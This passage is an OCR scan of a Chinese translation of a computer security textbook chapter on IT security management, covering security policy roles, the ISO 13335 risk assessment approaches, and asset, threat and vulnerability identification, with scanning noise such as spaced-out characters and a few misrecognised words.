提供 规划 、 设 计 和 管理 服务 。 为 了 说 明 此 类 政策 提供 的 详细 程度 ， 文 档 SecurityPolicypdf 的 第 1 
部 分 (https://app.box.com/V/CompSec4e) 提供 了 该 文档 的 第 5 部 分 ， 其 中 包括 物理 和 环境 安全 。 

SecurityPolicy.pdf 文件 的 在 线 第 2 部 分 提供 了 有 关 安 全 策略 要 求 的 进一步 指导 ， 其 中 包 
括 来 自信 息 安全 论坛 的 信息 安全 良好 实践 标准 ( The Standard of Good Practice for Information 
Security) 的 规范 。 

术语 “security policy” 还 可 以 指 对 应 特定 系统 或 特定 控制 规程 与 过 程 的 特定 安全 规则 。 正 
如 我 们 在 第 27 章 讨论 可 信 计 算 时 ， 它 指 保密 性 和 完整 性 的 形式 模型 。 然 而 在 本 章 ， 我 们 用 这 
个 术语 来 描述 总 体 安全 目标 和 战略 ， 就 像 本 节 一 开始 所 摘 述 的 。 

组 织 的 IT 安全 方针 得 到 高 级 管理 层 一 致 认可 和 接受 是 至 关 重 要 的 。 经 验 表 明 ， 如 果 做 不 
到 这 一 点 ,将 很 难 获得 充分 的 资源 或 重视 程度 去 实现 既定 的 目标 并 取得 适当 的 安全 成 果 。 有 了 
高 级 管理 层 的 明确 支持 ， 安 全 才 更 有 可 能 被 组 织 内 各 级 人 员 严 肃 对待 。 这 种 支持 也 是 组 织 在 系 
统管 理 和 风险 状况 监视 方面 关注 且 尽 职 的 表现 。 

由 于 信息 安全 责任 由 整个 组 织 的 各 个 部 门 分 担 ， 那 么 就 存在 安全 执行 不 一 致 、 缺 乏 机 制 监 
控 的 风险 。 各 种 标准 均 强 烈 建议 将 组 织 的 信息 安全 的 全 部 责任 归于 一 个 人 ， 即 组 织 的 信息 安全 
官 。 这 个 人 最 好 具有 一 定 的 信息 安全 背景 。 其 职责 包括 : 

e 监督 信息 安全 管理 过 程 。 

e 与 主管 信息 安全 的 高 级 管理 层 联络 。 

e 维护 组 织 的 信息 安全 目标 、 战 略 和 方针 。 

e 协调 对 信息 安全 事件 的 啊 应 。 

e 管理 整个 组 织 的 信息 安全 意识 和 培训 计划 。 

e 与 IT 项 目 安全 官 相互 沟通 。 

更 大 的 组 织 还 需要 设置 分 别 负责 各 主要 项 目 和 系统 的 IT 项 目 安全 官 。 他 们 的 职责 是 开发 
和 维护 各 自 系 统 的 安全 方针 ， 开 发 和 实施 与 这 些 系统 相关 的 安全 计划 ， 解 决 这 些 计 划 实 施 过 程 
中 日 常 监测 到 的 问题 ， 并 协助 调查 涉及 这 些 系统 的 事件 。 


14.3 ”安全 风险 评估 
现在 我 们 将 注意 力 转移 到 IT 安全 过 程 中 关键 的 风险 管理 部 分 。 这 个 阶段 至 关 重 要 ， 如 果 


O RX policy 的 含义 可 大 可 小 ， 分 别 对 应 中 文 的 方针 或 策略 。 因 此 ， 根 据 作者 的 本 意 ， 本 章 大 部 分 地 方 番 


译 为 “方针 ”， 仅 在 此 处 出 现 “ 策 略 ”。 参 见 谢 宗 晓 等 著 《 ISO/IEC 27001:2013 标准 解读 及 改版 分 析 》 第 29 
页 的 脚注 228 、229 及 第 30 页 的 脚注 234 ~ 236。 一 一 译 者 注 
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没有 它 ， 将 很 可 能 使 资源 得 不 到 最 有 效 的 部 署 。 这 将 导致 部 分 风险 未 被 处 理 ， 使 得 组 织 留 下 
安全 薄弱 点 ， 同 时 其 他 保障 措施 的 部 署 也 可 能 因此 而 不 够 合理 ， 从 而 白白 地 浪费 了 时 间 和 人 金 
钱 。 理 想 状态 下 ， 组 织 中 的 每 一 项 资产 都 应 该 受到 检查 ， 可 能 的 各 种 风险 都 需 进 行 评 估 。 如 果 
某 种 风险 被 认为 很 严重 ， 就 有 必要 采取 适当 的 补救 控制 措施 ， 来 将 风险 降低 至 一 个 可 以 接受 的 
水 平 。 实 践 中 这 显然 是 不 可 能 的 。 考 虑 到 时 间 和 人 力 上 的 要 求 ， 即 使 是 大 型 的 、 资 源 丰 富 的 组 
织 ， 这 也 显然 是 既 不 可 行 也 不 合算 的 。 即 使 可 能 ， 考 虑 到 信息 技术 和 威胁 环境 的 快速 变化 ， 也 
将 意味 着 这 些 评估 如 果 不 早点 开始 ， 就 很 可 能 会 出 现 其 做 完 时 就 已 经 过 时 了 ! 很 明显 ， 评估 方 
式 需 要 某 种 方式 的 折 中 。 

另 一 个 问题 是 如 何 确 定 一 个 适当 的 风险 接受 水 平 。 在 理想 的 世界 里 ， 我 们 的 目标 应 该 是 完 
全 消除 所 有 的 风险 。 同 样 ， 这 也 是 不 可 能 的 。 一 个 更 现实 的 选择 是 耗费 一 定数 量 的 资源 以 降低 
风险 ， 而 所 需 开 销 是 与 风险 一 旦 发 生 将 给 组 织造 成 的 潜在 损失 成 正比 的 。 这 一 过 程 也 必须 考虑 
到 风险 发 生 的 可 能 性 。 对 可 接受 的 风险 水 平 的 确定 是 需要 审慎 管理 的 ， 也 就 是 说 所 耗费 的 资源 
从 组 织 的 可 用 预算 、 时 间 和 人 力 资源 角度 考虑 应 当 是 合理 的 。 风 险 评估 过 程 的 目的 是 为 管理 提 
供 必 要 的 信息 ， 在 有 效 部 署 可 用 资源 方面 做 出 合理 的 决策 。 

对 于 从 小 型 企业 到 跨国 公司 再 到 各 国政 府 的 不 同 规模 的 组 织 ， 显 然 需要 提供 不 同 的 风险 评 
估 方 案 。 目 前 有 一 些 正式 标准 适合 于 IT 安全 风险 评估 过 程 ， 包 括 ISO 13335、ISO 27005, ISO 
31000 和 NIST SP 800-30。 特 别 地 ，ISO 13335 给 出 了 识别 和 降低 一 个 组 织 的 I 基础 设施 风险 
的 4 种 方法 : 

e 基线 方法 

e 非 形 式 化 方法 

e 详细 的 风险 分 析 

e 组 合 方法 

选择 什么 样 的 方法 是 由 组 织 的 可 用 资源 决定 的 ， 并 从 最 初 的 高 级 风险 分 析 开 始 ， 该 分 析 主 
要 考虑 信息 系统 的 价值 有 有 多大、 对 组 织 的 业务 目标 有 多 重要 。 法 律 和 规章 约束 也 可 能 要 求 特定 
的 方法 。 该 信息 应 当 在 制定 组 织 的 IT 安全 目标 、 战 略 和 方针 时 确定 。 


14.3.1 基线 方法 


风险 评估 的 基线 方法 目的 在 于 使 用 基线 文档 、 实 用 规则 和 行业 最 佳 实践 来 实现 一 个 基本 的 
系统 安全 控制 水 平 。 这 个 方法 的 优点 是 ， 它 不 需要 消耗 在 进行 一 个 更 为 形式 化 的 风险 评估 时 所 
需 的 额外 的 资源 ， 并 且 在 一 系列 的 系统 上 ， 相 同 措施 都 可 以 重复 使 用 。 主 要 的 缺点 是 ， 没 有 从 
组 织 类 型 和 系统 使 用 方式 等 角度 对 组 织 风 险 暴 露 的 差异 进行 特别 的 考虑 。 并 且 ， 基 线 水 平 可 能 
被 设置 得 太 高 ， 导 致 安全 措施 太 昂贵 或 者 受到 限制 ， 以 至 于 可 能 得 不 到 批准 ; 也 可 能 设置 得 太 
低 ， 导 致 安全 性 不 足 ， 给 组 织 留 下 安全 薄弱 点 。 

基线 方法 的 目标 是 执行 普遍 认可 的 安全 控制 措施 ， 提 供 针 对 最 常见 威胁 的 保护 。 这 应 当 包 
括 在 配置 和 部 署 系统 过 程 中 实施 行业 最 佳 实践 ， 就 像 我 们 在 第 12 章 讨 论 操作 系统 安全 时 所 提 
到 的 那样 。 就 这 一 点 而 言 ， 基 线 方法 为 进一步 安全 措施 的 确定 打下 了 良好 的 基础 。 适 当 基 线 的 
建议 和 核查 表 可 以 从 一 系列 组 织 获 得 ， 包 括 : 

e 各 种 国家 和 国际 的 标准 化 组 织 

e 安全 相关 的 组 织 (如 CERT、NSA 等 ) 

e 行业 部 门 委员 会 或 峰会 集团 

单独 使 用 基线 方法 通常 仅 推荐 给 那些 没有 资源 去 实施 更 为 结构 化 方法 的 小 型 组 织 。 但 它 至 
少 确 保 部 署 了 一 个 基本 水 平 的 安全 措施 ， 这 是 很 多 系统 的 默认 配置 所 不 能 保证 的 。 
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14.3.2 ” 非 形 式 化 方法 


非 形式 化 方法 需要 对 组 织 的 信息 系统 进行 一 些 非 形式 化 的 实用 的 风险 分 析 。 这 种 分 析 不 使 
用 形式 化 的 、 结 构 化 的 流程 ， 而 是 利用 分 析 执 行人 员 的 知识 和 专业 技术 。 这 些 人 员 可 以 是 内 部 
专家 ,如 果 有 的 话 ， 也 可 以 是 外 部 顾问 。 这 个 方法 的 最 主要 的 优点 是 ， 执 行 分 析 的 人 员 不 需要 
额外 的 技术 。 因 此 ， 非 形式 化 的 风险 评估 的 进行 相对 更 快捷 和 经 济 。 另 外 ， 因 为 组 织 的 系统 一 
直 处 于 受 检查 状态 ， 所 以 具体 的 漏洞 和 风险 能 够 得 到 判定 ， 这 一 点 是 基线 方法 所 不 能 做 到 的 。 
因此 ， 我 们 将 能 够 使 用 比 基 线 方法 情形 下 更 为 准确 、 有 针对 性 的 控制 措施 。 这 种 方法 也 有 一 些 
不 足 。 因 为 没有 使 用 形式 化 的 流程 ， 将 有 可 能 导致 一 些 风 险 没 有 被 适当 地 考虑 ， 给 组 织 留 下 了 
浴 在 的 弱点 。 还 有 ， 因 为 这 种 方法 是 非 形式 化 的 ， 可 能 因 分 析 人 员 的 观点 和 偏见 而 导致 结果 有 
偶 差 。 这 个 方法 也 可 能 导致 建议 的 控制 措施 不 能 得 到 充分 的 合理 性 证 明 ， 从 而 引发 关于 所 提议 
的 费用 是 否 确实 合理 的 质疑 。 最 后 ， 由 于 分 析 人 员 专 业 技术 水 平 的 差异 ， 随 着 时 间 的 推移 ， 可 
能 出 现 不 一 致 的 结果 。 

非 形 式 化 方法 的 使 用 ， 一般 应 该 推荐 给 这 样 一 些小 型 或 中 等 规模 的 组 织 : 它们 的 信息 系统 
对 于 实现 其 业务 目标 并 非 必需 ， 且 不 能 证 明 风 险 分 析 造 成 的 额外 文 出 的 合理 性 。 


14.3.3 ”详细 风险 分 析 


第 三 种 方法 是 最 全 面 的 一 种 方法 ， 就 是 采用 形式 化 、 结 构 化 的 流程 对 组 织 的 信息 系统 进 
行 详细 的 风险 评估 。 这 种 方法 最 大 限度 地 保证 了 所 有 重大 的 风险 都 得 到 确认 ， 相 关 的 问题 都 予 
以 考虑 。 这 个 过 程 有 许多 阶段 ， 包 括 资 产 识 别 ， 资 产 面临 的 威胁 和 脆弱 性 的 识别 ， 对 风险 发 生 
可 能 性 、 风 险 发 生 后 对 组 织 可 能 造成 的 影响 的 判定 ， 最 终 得 出 组 织 所 面临 的 风险 。 有 了 这 些 信 
恩 ， 就 能 选择 并 实施 适当 的 控制 措施 来 处 理 已 识别 的 风险 。 这 种 方法 的 优点 是 ， 它 为 组 织 的 信 
县 系统 提供 了 最 详细 的 安全 风险 分 析 ， 并 为 控制 措施 所 需 支 出 提供 了 有 力 的 合理 性 证 明 。 它 还 
为 系统 发 展 变 化 过 程 中 的 持续 安全 管理 提供 了 最 佳 的 信息 。 这 种 方法 的 主要 缺点 是 ， 实 施 这 样 
一 次 风险 分 析 ， 在 时 间 、 资 源 和 专业 技术 方面 需要 相当 的 成 本 。 这 种 分 析 所 用 的 时 间 ， 也 可 能 
会 导致 不 能 及 时 为 某 些 系统 提供 适宜 水 平 的 保护 。 这 种 方法 的 细节 将 在 下 一 节 讨 论 。 

对 于 政府 机 关 及 其 关键 服务 商 ， 采 用 形式 化 的 详细 的 风险 分 析 往 往 是 一 种 法 律 要 求 。 提 供 
关键 性 国家 基础 设施 的 组 织 可 能 也 是 同样 的 情况 。 对 这 样 的 组 织 ， 除 了 此 种 方法 ， 没 有 其 他 的 
选择 。 那 些 信息 系统 对 业务 目标 的 实现 至 关 重 要 ， 并 具有 实施 这 种 风险 分 析 所 需 资源 的 大 型 组 
织 也 可 以 选择 这 种 方法 。 


14.3.4 ”组合 方法 


最 后 这 种 方法 组 合 了 基线 方法 、 非 形式 化 方法 和 详细 的 风险 分 析 方 法 的 元 素 。 它 的 目标 是 
尽 可 能 快 地 提供 一 个 合理 水 平 的 保护 ， 然 后 不 断 地 检查 和 调整 部 署 在 关键 系统 上 的 防护 控制 措 
施 。 这 种 方法 首先 在 所 有 系统 上 实施 适当 的 基线 安全 建议 。 然 后 ， 通 过 高 级 风险 评估 识别 那些 
面临 高 风险 或 对 组 织 业务 目标 至 关 重 要 的 系统 。 它 可 以 做 出 决定 立即 对 关键 系统 进行 一 次 非 形 
式 化 风险 评 佑 ， 从 而 相当 迅速 地 调整 控制 措施 ， 以 便 更 准确 地 反映 系统 要 求 。 最 后 ， 它 可 以 建 
立 对 这 些 系 统 实施 详细 的 风险 分 析 的 有 序 过 程 。 随 着 时 间 的 推移 ， 这 将 使 得 最 适当 、 最 经 济 的 
安全 控制 措施 被 选择 出 来 并 用 于 这 些 系 统 中 。 这 个 方法 有 很 多 重要 的 优点 。 最 初 采 用 高 级 风险 
分 析 来 决定 哪里 需要 花费 更 多 的 资源 ， 而 未 采用 对 于 所 有 系统 的 全 部 细节 的 风险 分 析 ， 很 可 能 
更 容易 说 服 管理 层 。 此 方法 还 会 形成 一 幅 关 于 IT 资源 和 主要 风险 多 发 位 置 的 战略 性 画面 。 这 
为 以 后 对 组 织 的 安全 管理 进行 规划 提供 了 重要 的 帮助 。 基 线 方法 和 非 形 式 化 分 析 方 法 的 使 用 确 
保 了 基本 的 安全 防护 措施 能 够 尽早 实施 。 这 也 意味 着 资源 更 有 可 能 得 到 有 效 的 利用 ， 而 处 境 最 
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危险 的 系统 则 可 以 尽 可 能 早 地 得 到 进一步 分 析 。 然 而 ， 这 种 方法 也 有 一 些 缺 点 。 如 果 最 初 的 高 
级 分 析 不 准确 ， 那 么 一 些 本 应 接受 详细 风险 分 析 的 系统 在 一 段 时 间 内 仍 将 是 脆弱 的 。 尽 管 如 
此 ， 基 线 方法 的 使 用 将 保证 那些 系统 具有 基本 的 最 低 安全 水 平 。 而 且 ， 如 果 对 高 级 分 析 的 结果 
进行 适当 的 复查 ， 那 么 遗漏 脆弱 性 的 可 能 将 被 最 小 化 。 

ISO 13335 认为 ， 对 于 大 多 数组 织 ， 在 大 多 数 环境 下 ， 这 种 方法 具有 最 佳 性 价 比 。 因 此 其 
得 到 强烈 推荐 。 


14.4 详细 的 安全 风险 分 析 


形式 化 的 、 详 细 的 安全 风险 分 析 方 法 ， 对 组 织 的 信息 系统 安全 风险 提供 了 最 准确 的 评 
估 ， 但 是 成 本 却 最 高 。 这 个 方法 与 可 信 计 算 机 系统 的 发 展 有 关 ， 其 最 初 关 注 于 处 理 国 防 安全 
问题 ， 正 如 我 们 在 第 27 章 中 所 讨论 的 。 最 初 的 安全 风险 评估 方法 论 出 现在 黄皮书 标准 (CSC- 
STD-004-85, 19854F 6H) 中 ， 这 是 最 初 的 美国 TCSEC 彩虹 书 系列 标准 之 一 。 它 把 重点 完全 
放 在 保护 信息 保密 性 方面 ， 反映 出 军 方 对 信息 分 类 的 关注 。 它 推荐 的 可 信 计 算 机 系统 的 分 级 
方法 依赖 于 最 小 用 户 安全 许可 与 最 大 信息 分 类 的 差 值 。 具 体 来 说 ， 它 定义 风险 指标 为 

风险 指标 三 最 大 信息 敏感 性 一 最 小 用 户 安全 许可 

该 标准 有 一 张 表 ， 对 于 每 个 风险 等 级 列 出 了 适当 的 系统 范围 ， 该 表 曾 被 用 来 选择 系统 类 
型 。 很 明显 ， 这 种 受 限 的 方法 既 不 能 适当 地 反映 所 需要 的 安全 服务 的 范围 ， 也 不 能 适当 地 反映 
可 能 发 生 的 种 类 繁多 的 威胁 。 此 后 经 过 很 多 年 ， 真 正 考虑 上 述 问题 的 安全 风险 评估 实施 过 程 才 

很 多 国家 标准 和 国际 标准 包含 了 人 们 所 期 待 的 形式 化 风险 分 析 方 法 。 其 中 包括 ISO 27005、 
ISO 31000, NIST SP 800-30 和 [SASN13]。 政 府 组 织 和 相关 厂商 通常 强制 要 求 采用 这 种 方法 。 这 
些 标准 大 体 采 用 了 相同 的 过 程 。 图 14-3 (复制 自 NIST SP 800-30 图 5 ) 描述 了 一 个 典型 的 流程 。 


Bis: 准备 评估 
从 组 织 层面 起 步 
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14.4.1 情境 和 系统 特征 


第 一 步 称 为 “情境 或 系统 特征 建立 ” 。 其 目的 是 确定 在 将 要 进行 的 风险 评估 中 使 用 的 基本 
参数 ， 然 后 识别 需要 检查 的 资产 。 
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情境 建立 ”风险 评估 过 程 从 组 织 的 安全 目标 人 人手， 考虑 组 织 骏 露 的 广泛 风险 。 这 将 发 现 并 
非 所 有 的 组 织 都 具有 同样 的 风险 ， 某 些 组 织 会 因为 其 功能 而 受到 攻击 者 的 特别 关注 。 这 需要 探 
究 特 定 组 织 与 其 所 处 的 更 广阔 的 政治 和 社会 环境 的 关系 。 图 14-4 (改编 自 IDC 2000 报告 ) 建 
议 了 一 种 可 能 的 组 织 风 险 图 谱 。 与 政府 或 银行 金融 业 相 比 ， 诸 如 农业 和 教育 这 样 的 行业 所 面临 
的 风险 就 较 小 。 注 意 ， 这 种 分 类 方法 是 于 9: 11 事件 之 前 做 出 的 ， 由 于 情况 的 发 展 ， 目 前 可 能 
已 经 有 所 变化 。 例 如 ， 特 别 是 公用 事业 ， 其 实际 风险 可 能 比 上 述 分 类 方法 中 建议 的 要 高 。NIST 
指出 S， 下 述 行业 的 监控 与 数据 采集 (Supervisory Control And Data Acquisition, SCADA) 和 过 
程控 制 系统 对 于 风险 更 为 脆弱 电力、 给 排水 、 石 油 和 天然气、 运输、 化学、 制药 、 纸 浆 和 造 
纸 、 食 品 饮料 、 离 散 制 造 (汽车 、 航 空 和 耐用 消费 品 )、 航 空 和 铁路 运输 、 来 矿 和 冶金 。 


高 脆弱 性 








14-4 通用 的 组 织 风险 情境 


在 确定 组 织 暴 露 的 广泛 风险 的 同时 ， 也 必须 识别 出 来 任何 相关 的 法 律 和 规章 约束 。 上 述 特 
征 为 组 织 的 风险 暴露 提供 了 一 个 基线 ， 并 对 管理 这 些 风 险 以 保证 业务 的 成 功 运行 所 需 耗 费 的 大 
量 资源 做 出 了 初步 的 说 明 。 

其 次 ， 高 级 管理 层 必 须 定义 组 织 的 风险 偏好 (risk appetite)， 即 组 织 所 能 接受 的 风险 水 平 。 
同样 ， 这 在 很 大 程度 上 取决 于 组 织 的 类 型 及 管理 层 对 其 业务 经 营 方式 的 态度 。 例 如 ， 银 行 和 人 金 
融 组 织 往 往 十 分 保守 ， 持 风险 规避 态度 。 这 意味 着 他 们 希望 残余 风险 越 低 越 好 ， 并 且 愿 意 耗 费 
必要 的 资源 来 达到 此 目标 。 相 反 ， 拥 有 新 品牌 产品 的 领先 厂商 则 可 能 有 大 得 多 的 风险 耐 受 度 。 
这 类 厂商 愿意 冒险 来 获取 竞争 优势 ， 因 而 不 希望 在 安全 控制 方面 投入 更 多 资源 。 这 种 决策 方法 
并 不 仅仅 针对 IT 领域 ， 其 反映 了 组 织 在 业务 经 营 方 面 的 总 体 管理 方法 。 

随后 识别 风险 评估 的 边界 。 其 范围 可 能 从 单独 某 一 系统 或 者 组 织 的 某 一 方面 到 组 织 的 整个 
IT 基础 设施 。 这 将 部 分 取决 于 所 采用 的 风险 评估 方法 。 一 种 组 合 方 法 要 求 随 着 组 织 安 全 状况 
的 变化 ， 不 断 对 各 关键 组 件 分 别 进行 评估 。 同 时 你 也 将 发 现 ， 并 非 所 有 的 系统 都 处 于 组 织 的 控 
制 之 下 。 特 别 是 当 某 些 服务 或 系统 由 外 部 提供 时 ， 就 可 能 需要 单独 考虑 它们 。 过 程 中 的 各 种 干 
系 人 同样 需要 识别 出 来 ， 需 要 确定 由 谁 来 运行 和 监控 组 织 的 风险 评估 过 程 。 另 外 ， 过 程 所 需 的 
资源 必须 给 其 分 配 。 所 有 的 这 些 都 需要 取得 高 级 管理 层 的 支持 ， 因 为 他 们 的 承诺 对 于 过 程 的 成 
功 完 成 是 至 关 重 要 的 。 

需要 决定 风险 评估 过 程 具体 应 用 的 评估 准则 。 尽 管 对 此 过 程 已 达成 广泛 的 共识 ， 但 实际 
的 细节 和 应 用 的 表格 仍 有 相当 大 的 不 同 且 还 在 不 断 变 化 中 。 可 以 根据 该 组 织 或 相关 组 织 以 前 所 
应 用 的 评估 准则 来 做 出 决定 。 对 政府 组 织 来 说 ， 可 以 根据 法 律 或 规章 要 求 来 决定 评估 准则 。 最 
后 ， 风 险 分 析 实 施 人 员 也 可 以 根据 自身 的 知识 和 经 验 来 决定 评估 准则 。 


O AAA [NIST13] 的 执行 概要 。 
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资产 识别 ”风险 评估 第 一 步 的 最 后 一 项 内 容 是 识别 需要 分 析 的 资产 。 这 直接 解决 我 们 在 
本 章 之 初 提出 的 三 个 基本 问题 中 的 第 一 个 问题 “我 们 需要 保护 哪些 资产 ?” 资 产 (asset) 是 
对 组 织 有 价值 、 对 组 织 成 功 实现 目标 有 帮助 而 “需要 保护 的 任何 事物 ”。 就 像 我 们 在 第 1 章 
中 讨论 的 ， 资 产 既 可 以 是 有 形 的 ， 也 可 以 是 无 形 的 。 它 包括 了 计算 机 和 通信 硬件 基础 设施 、 
软件 (包括 应 用 程序 和 保存 在 这 些 系统 中 的 信息 /数据 )、 这 些 系 统 中 的 文件 ， 以 及 管理 和 维 
护 这 些 系 统 的 人 员 。 在 风险 评估 的 边界 之 内 ， 需 要 识别 这 些 资产 ， 其 对 组 织 的 价值 需要 评 
估 。 需 要 重申 的 是 ， 尽 管理 想 情 况 下 应 该 考虑 每 一 个 能 够 想到 的 资产 ， 但 在 实践 中 这 是 不 可 
能 的 。 这 里 的 目标 应 该 是 识别 所 有 对 实现 组 织 目标 有 重大 作用 、 一 旦 受 损 将 严重 影响 组 织 运 
行 的 资产 。[SASN13] 描述 了 这 样 一 个 旨 在 识别 出 对 于 组 织 最 为 重要 的 那些 资产 的 “关键 性 
评估 ”过 程 。 

尽管 风险 评估 过 程 大 多 由 安全 专家 管理 ， 但 他 们 并 不 一 定 高 度 熟 悉 组 织 的 运作 和 绪 构 。 因 
而 他 们 需要 吸收 组 织 中 相关 领域 人 员 的 专业 知识 ， 用 来 识别 关键 资产 以 及 这 些 资产 对 组 织 的 价 
值 。 这 一 步 的 一 个 关键 要 素 就 是 识别 这 些 人 员 并 与 之 访谈 。 前 面 所 列 出 的 许多 标准 都 包含 了 各 
类 资产 的 核查 表 和 收集 必要 信息 方法 的 建议 。 应 考虑 和 使 用 这 些 标 准 。 这 个 步骤 的 输出 结 采 应 
当 是 一 份 资产 清单 ， 其 中 简要 描述 了 这 些 资 产 在 组 织 中 的 用 途 和 价值 。 


14.4.2 威胁 /风险 /脆弱 性 的 确认 


过 程 的 下 一 步 是 识别 资产 暴露 在 什么 样 的 威胁 或 者 风险 下 。 这 直接 解决 三 个 基本 问题 中 的 
第 二 个 问题 “这些 资 产 受到 了 怎样 的 威胁 ?” 这 里 对 使 用 的 一 些 术语 需要 作 一 些 说 明 。 术 语 
“威胁 ”和 “风险 ”尽管 具有 不 同 的 含义 ,但 在 这 里 经 常 交 替 使 用 。 在 上 面 所 引用 的 标准 中 对 
这 些 术语 的 定义 有 相当 大 的 不 同 。 下 列 定义 将 有 助 于 我 们 的 讨论 : 


资产 (asset): 需要 保护 的 对 所 有 者 有 价值 的 系统 资源 或 能 力 。 

威胁 (threat): 威胁 源 利 用 某 种 资产 的 脆弱 性 的 潜在 行为 ， 该 行为 一 旦 发 生 ， 将 危及 资产 安 
全 ， 并 损害 资产 所 有 者 的 利益 。 

脆弱 性 (vulnerability): 资产 在 设计 、 实 施 、 和 运行 、 管 理 过程 中 可 能 被 某 种 威胁 利用 的 缺陷 


或 弱点 。 
风险 (risk): 根据 以 下 两 个 要 素 组 合计 算出 的 潜在 损失 : 给 定 威胁 利用 资产 本 身 的 脆弱 性 的 
可 能 性 以 及 对 资产 所 有 者 造成 的 损害 程度 。 


图 1-2 说 明了 以 上 几 个 概念 与 其 他 安全 概念 之 间 的 关系 。 

这 个 阶段 的 目标 是 识别 出 已 列 资产 的 潜在 的 重大 风险 。 因 此 ， 对 每 一 项 资产 ， 都 需要 弄 清 
以 下 儿 个 问题 : 

1. 谁 或 者 什么 导致 它 受 到 损害 ? 

2. 损害 是 如 何 发 生 的 ? 

威胁 识别 ”要 回答 上 述 的 第 一 个 问题 ， 需 要 识别 资产 面临 的 潜在 威胁 。 广 义 上 讲 ， 威 胁 是 
任何 可 能 会 阻碍 或 阻止 资产 得 到 适当 水 平 的 关键 安全 服务 的 事情 ， 这 些 关 键 安全 服务 包括 : TR 
密 性 、 完 整 性 、 可 用 性 、 可 核查 性 、 真 实 性 和 可 靠 性 。 注 意 ， 一 个 资产 可 以 面临 多 个 威胁 ， 而 
一 个 威胁 也 可 以 针对 多 个 资产 。 

威胁 既 可 以 是 上 自然 的 ， 也 可 以 是 人 为 的 ; 既 可 以 是 偶然 的 ， 也 可 以 是 故意 的 。 这 被 称 为 
威胁 源 。 典 型 的 自然 威胁 源 常 被 称 为 天 灾 ， 包 括 火 灾 、 水 灾 、 暴 风雨 、 地 震 和 其 他 一 些 上 自然 事 
件 。 环 境 威胁 如 长 期 的 电力 或 天 然 气 中 断 ， 也 包括 在 自然 威胁 之 内 。 还 可 能 是 化 学 污染 或 泄漏 
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的 结果 。 男 一 种 情况 下 ,威胁 源 可 以 是 直接 或 间接 造成 影响 的 人 为 活动 。 前 者 如 内 部 人 员 为 了 
个 人 利益 而 获取 并 出 卖 信息 ， 或 者 黑客 通过 因特网 攻击 组 织 的 服务 器 。 后 者 如 一 些 人 编写 并 各 
放 网 络 蠕虫 以 感染 组 织 的 系统 。 上 述 的 例子 都 是 故意 造成 的 威胁 。 然 而 ， 威 胁 也 可 以 是 意外 事 
件 的 结果 ， 比 如 雇员 在 系统 中 输入 信息 不 正确 ， 从 而 导致 系统 故障 。 

识别 可 能 的 威胁 和 威胁 源 ， 需 要 通过 各 种 渠道 ， 并 结合 风险 评估 者 的 经 验 。 在 任何 特定 
领域 ， 自 然 威胁 发 生 的 概率 通常 能 从 保险 统计 数据 中 得 到 。 其 他 潜在 威胁 的 列表 可 以 在 各 种 标 
准 、IT 安全 调查 的 结果 和 政府 安全 机 构 发 布 的 信息 中 找到 。 每 年 的 计算 机 犯罪 报告 ， 如 美国 
的 CSI/FBI 和 Verizon 发 布 的 报告 以 及 其 他 国家 发 布 的 报告 ， 在 广泛 的 IT 威胁 环境 和 最 常见 的 
问题 领域 中 ， 提 供 了 有 用 的 通用 指南 。 一 些 标准 ， 如 NIST SP 800-30 附录 D 中 提供 的 威胁 源 
分 类 法 和 附录 E 中 提供 的 威胁 实例 ， 在 这 里 也 有 帮助 。 

然而 ， 这 种 通用 指导 需要 针对 组 织 及 其 所 运行 的 风险 环境 进行 一 些 调 整 。 这 就 需要 对 组 织 
信息 系统 内 的 脆弱 性 进行 分 析 ， 因 为 某 些 风险 的 影响 比 在 通常 的 情形 下 大 些 或 者 小 些 。 对 于 组 
织 高 度 关注 的 安全 方面 需要 具体 识别 其 威胁 ， 可 以 按照 NIST SP 800-30 所 述 的 方法 对 威胁 场景 
进行 建 模 、 开 发 和 分 析 。 组 织 定 义 一 些 威胁 场景 来 描述 攻击 者 如 何 部 署 战术 、 技 术 和 规程 ， 这 
样 会 造成 损害 。 应 将 蓄意 攻击 者 对 组 织 的 可 能 攻击 动机 ， 作 为 风险 变化 的 潜在 影响 因素 。 此 
外 ,组 织 要 考虑 以 前 所 发 现 的 受 攻击 经 历 ， 因 为 这 可 以 作为 风险 要 发 生 的 具体 证 据 。 当 评估 可 
能 的 人 为 威胁 源 时 ， 他 们 对 组 织 的 攻击 原因 和 攻击 能 力 值得 考虑 ， 这 包括 : 

e 动机 : 他 们 为 什么 要 以 这 个 组 织 为 目标 ; 他 们 的 动机 如 何 ? 

e 能力: 他 们 利用 威胁 的 技术 水 平 如 何 ? 
资源 : 他 们 可 能 利用 多 少时 间 、 金 钱 和 其 他 资源 ? 

e 攻击 的 可 能 性 : 你 的 资产 被 作为 目标 的 可 能 性 有 多 大 ? 频率 有 多 高 ? 

e 威慑 : 对 于 攻击 者 ， 被 发 现 的 后 果 是 什么 ? 

脆弱 性 识别 ”回答 第 二 个 问题 ,“ 损 害 是 如 何 发 生 的 ? ”需要 识别 组 织 的 信息 系统 或 过 程 可 
能 被 威胁 源 利 用 的 缺陷 或 弱点 。 这 将 帮助 确定 威胁 对 组 织 的 适用 性 及 严重 性 。 需 要 注意 的 是 ， 
仅仅 存在 某 种 脆弱 性 并 不 意味 着 对 资产 的 损害 将 会 产生 。 对 某 种 威胁 来 说 ， 还 必须 有 一 个 威胁 
源 可 以 利用 脆弱 性 来 造成 损害 。 威 胁 和 漏洞 组 合 起 来 构成 了 对 资产 的 风险 。 

同样 ， 前 面 所 列 出 的 许多 标准 都 包含 威胁 和 脆弱 性 的 核查 表 以 及 列 出 这 些 威胁 与 脆弱 性 并 
确定 它们 与 组 织 相关 性 的 工具 和 技术 。 这 一 步 的 输出 应 当 是 威胁 和 脆弱 性 列表 以 及 对 其 发 生 方 
式 和 发 生 原 因 的 简要 描述 。 


14.4.3 分 析 风 险 


识别 了 关键 资产 以 及 这 些 资 产 所 暴露 的 可 能 威胁 和 脆弱 性 之 后 ， 下 一 步 是 确定 它们 对 组 
织 的 风险 等 级 的 影响 。 这 样 做 的 目的 是 对 那些 威胁 到 组 织 正常 运行 的 资产 的 风险 进行 识别 和 分 
类 。 风 险 分 析 也 为 管理 层 提供 了 信息 ， 和 帮助 管理 者 评价 这 些 风 险 并 决定 如 何 最 好 地 处 置 这 些 风 
险 。 风 险 分 析 需 要 首先 根据 已 有 控制 措施 ， 确 定 资产 的 每 一 个 已 识别 威胁 发 生 的 可 能 性 。 然 后 
